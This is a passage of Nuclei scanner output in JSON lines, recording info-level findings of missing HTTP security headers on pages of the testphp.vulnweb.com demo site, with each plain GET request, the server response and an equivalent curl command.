Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:35.957916841Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.294325916Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.294360313Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.294398445Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.934301356Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.934366285Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.934376955Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:36.934387625Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:37.554085482Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:32 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:37.554115005Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page 